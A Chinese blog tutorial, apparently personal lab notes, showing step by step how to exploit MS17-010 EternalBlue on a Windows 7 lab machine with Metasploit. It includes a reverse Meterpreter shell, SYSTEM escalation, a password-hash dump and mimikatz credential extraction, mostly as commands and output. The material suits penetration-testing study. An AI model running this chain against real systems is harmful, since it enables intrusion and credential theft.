溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

ms17-010漏洞利用教程

發(fā)布時(shí)間:2020-07-17 09:37:32 來(lái)源:網(wǎng)絡(luò) 閱讀:3702 作者:時(shí)間帶 欄目:安全技術(shù)

主要是方便自己之后忘了,而寫的,大佬繞過,大佬繞過,大佬繞過,重要的說(shuō)三遍。哈哈



***機(jī):

IP地址:192.168.10.15

系統(tǒng):kali linux


靶機(jī):

IP地址:192.168.10.13

系統(tǒng):win7


啟動(dòng)metasploit-framework

~# msfconsole 

ms17-010漏洞利用教程


查找需要用到的***模塊:

msf > search ms17-010


Matching Modules

================


   Name                                      Disclosure Date  Rank     Description

   ----                                      ---------------  ----     -----------

   auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

   auxiliary/scanner/smb/smb_ms17_010                         normal   MS17-010 SMB RCE Detection

   exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

   exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution



先用輔助模塊auxiliary/scanner/smb/smb_ms17_010,檢測(cè)目標(biāo)系統(tǒng)是否存在這個(gè)漏洞

msf > use auxiliary/scanner/smb/smb_ms17_010 

msf auxiliary(scanner/smb/smb_ms17_010) > options    查看需要設(shè)置那些參數(shù),看required,如果下面是yes就必須設(shè)置


Module options (auxiliary/scanner/smb/smb_ms17_010):


   Name         Current Setting                                                 Required  Description

   ----         ---------------                                                 --------  -----------

   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts

   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts

   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts

   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check

   RHOSTS                                                                       yes       The target address range or CIDR identifier

   RPORT        445                                                             yes       The SMB service port (TCP)

   SMBDomain    .                                                               no        The Windows domain to use for authentication

   SMBPass                                                                      no        The password for the specified username

   SMBUser                                                                      no        The username to authenticate as

   THREADS      1                                                               yes       The number of concurrent threads


msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.13  ####大部分參數(shù)已經(jīng)默認(rèn),只需要設(shè)置rhosts即可

rhosts => 192.168.10.13

msf auxiliary(scanner/smb/smb_ms17_010) > run  ###執(zhí)行 可以看到返回可能存在ms17-010漏洞


[+] 192.168.10.13:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed



使用exploit模塊:

msf auxiliary(scanner/smb/smb_ms17_010) > back   返回上層用back,不用也可以直接選擇另一個(gè)模塊,只是說(shuō)一下

msf > 


msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > options     ###查看需要設(shè)置參數(shù)

Module options (exploit/windows/smb/ms17_010_eternalblue):


   Name                Current Setting  Required  Description

   ----                ---------------  --------  -----------

   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.

   GroomDelta          5                yes       The amount to increase the groom count by per try.

   MaxExploitAttempts  3                yes       The number of times to retry the exploit.

   ProcessName         spoolsv.exe      yes       Process to inject payload into.

   RHOST                                yes       The target address

   RPORT               445              yes       The target port (TCP)

   SMBDomain           .                no        (Optional) The Windows domain to use for authentication

   SMBPass                              no        (Optional) The password for the specified username

   SMBUser                              no        (Optional) The username to authenticate as

   VerifyArch          true             yes       Check if remote architecture matches exploit Target.

   VerifyTarget        true             yes       Check if remote OS matches exploit Target.



Exploit target:


   Id  Name

   --  ----

   0   Windows 7 and Server 2008 R2 (x64) All Service Packs



msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.10.13   #####設(shè)置靶機(jī)ip

RHOST => 192.168.10.13

msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   ###設(shè)置payload如果是32位系統(tǒng)就用windows/meterpreter/reverse_tcp

payload => windows/x64/meterpreter/reverse_tcp

msf exploit(windows/smb/ms17_010_eternalblue) > options


Module options (exploit/windows/smb/ms17_010_eternalblue):


   Name                Current Setting  Required  Description

   ----                ---------------  --------  -----------

   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.

   GroomDelta          5                yes       The amount to increase the groom count by per try.

   MaxExploitAttempts  3                yes       The number of times to retry the exploit.

   ProcessName         spoolsv.exe      yes       Process to inject payload into.

   RHOST               192.168.10.13    yes       The target address

   RPORT               445              yes       The target port (TCP)

   SMBDomain           .                no        (Optional) The Windows domain to use for authentication

   SMBPass                              no        (Optional) The password for the specified username

   SMBUser                              no        (Optional) The username to authenticate as

   VerifyArch          true             yes       Check if remote architecture matches exploit Target.

   VerifyTarget        true             yes       Check if remote OS matches exploit Target.



Payload options (windows/x64/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   0   Windows 7 and Server 2008 R2 (x64) All Service Packs



msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.15  ####設(shè)置本地主機(jī)

lhost => 192.168.10.15

msf exploit(windows/smb/ms17_010_eternalblue) > run    ####執(zhí)行


[*] Started reverse TCP handler on 192.168.10.15:4444 

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 

[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 12 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=    中間可能會(huì)失敗,耐心點(diǎn)。

[-] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 

[*] 192.168.10.13:445 - Connecting to target for exploitation.

[+] 192.168.10.13:445 - Connection established for exploitation.

[+] 192.168.10.13:445 - Target OS selected valid for OS indicated by SMB reply

[*] 192.168.10.13:445 - CORE raw buffer dump (38 bytes)

[*] 192.168.10.13:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima

[*] 192.168.10.13:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 

[*] 192.168.10.13:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          

[+] 192.168.10.13:445 - Target arch selected valid for arch indicated by DCE/RPC reply

[*] 192.168.10.13:445 - Trying exploit with 17 Groom Allocations.

[*] 192.168.10.13:445 - Sending all but last fragment of exploit packet

[*] 192.168.10.13:445 - Starting non-paged pool grooming

[+] 192.168.10.13:445 - Sending SMBv2 buffers

[+] 192.168.10.13:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] 192.168.10.13:445 - Sending final SMBv2 buffers.

[*] 192.168.10.13:445 - Sending last fragment of exploit packet!

[*] 192.168.10.13:445 - Receiving response from exploit packet

[+] 192.168.10.13:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[*] 192.168.10.13:445 - Sending egg to corrupted connection.

[*] 192.168.10.13:445 - Triggering free of corrupted buffer.

[*] Sending stage (206403 bytes) to 192.168.10.13

[*] Meterpreter session 1 opened (192.168.10.15:4444 -> 192.168.10.13:49341) at 2018-05-13 10:17:45 +0800

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] 192.168.10.13:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


meterpreter >      拿到一個(gè)反彈的meterpreter



***后的提權(quán):

meterpreter > sysinfo  查看系統(tǒng)后的信息

Computer        : INI-PC

OS              : Windows 7 (Build 7601, Service Pack 1).

Architecture    : x64

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 2

Meterpreter     : x64/windows



meterpreter > getsystem   ===》####用這個(gè)提權(quán)比較順利,有時(shí)候這個(gè)提權(quán)可能提權(quán)不了,還可以通過繞過UAC進(jìn)行提權(quán),可以參考:http://netsecurity.51cto.com/art/201612/524691.htm

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM



抓取用戶的密碼:

meterpreter > hashdump 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:9f22bada0de76a5744d444632dafa2a7:::

ini:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::



meterpreter > load mimikatz   加載密碼提取神器,哈哈

Loading extension mimikatz...Success.



meterpreter > kerberos 

[+] Running as SYSTEM

[*] Retrieving kerberos credentials

kerberos credentials

====================


AuthID    Package    Domain        User           Password

------    -------    ------        ----           --------

0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  

0;996     Negotiate  WORKGROUP     INI-PC$        

0;47944   NTLM                                    

0;999     NTLM       WORKGROUP     INI-PC$        

0;114022  NTLM       ini-PC        ini            123456

0;113976  NTLM       ini-PC        ini            123456     ###得到用戶的密碼






向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI